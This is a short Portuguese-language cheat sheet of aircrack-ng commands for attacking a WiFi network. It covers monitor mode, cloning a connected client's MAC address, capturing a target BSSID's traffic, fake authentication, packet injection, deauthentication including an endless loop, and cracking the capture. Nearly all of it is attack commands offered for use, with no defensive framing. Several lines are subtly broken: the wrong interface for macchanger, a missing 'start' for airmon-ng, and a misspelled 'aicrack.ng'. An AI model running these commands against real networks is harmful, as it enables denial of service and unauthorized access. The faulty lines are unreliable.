Deauth forced

airodump-ng -M wlan0

airodump-ng --bssid [alvo] -c [channel] wlan0

Selecione um bssid conecatdo para clonar

ifconfig wlan0 down

macchanger --mac= xx:xx:xx:xx:xx:xx eth0

ifconfig wlan0 up

airmon-ng

airmon-ng wlan0

airodump-ng -M wlan0mon

airodump-ng -w [nome rede.lab] -c [channel] --bssid [alvo] wlan0mon

Nota:

Utilize as 3 primeiras opções para ter um ataque bem eficiênte:

(opção 1) Pequena desautenticação: novo konsole

aireplay-ng -1 0 -a [bssid alvo] wlan0mon

(opção 2) Injeção de pacotes:

aireplay-ng -3 -b [bssid alvo] wlan0mon

(opção 3) Desautenticação:

aireplay-ng -0 10 -a [bssid alvo] wlan0mon

(opção 4) Loop infinito:

aireplay-ng -0 0 -a [bssid alvo] wlan0mon

novo Konsole:

aicrack.ng [nome rede.lab].cap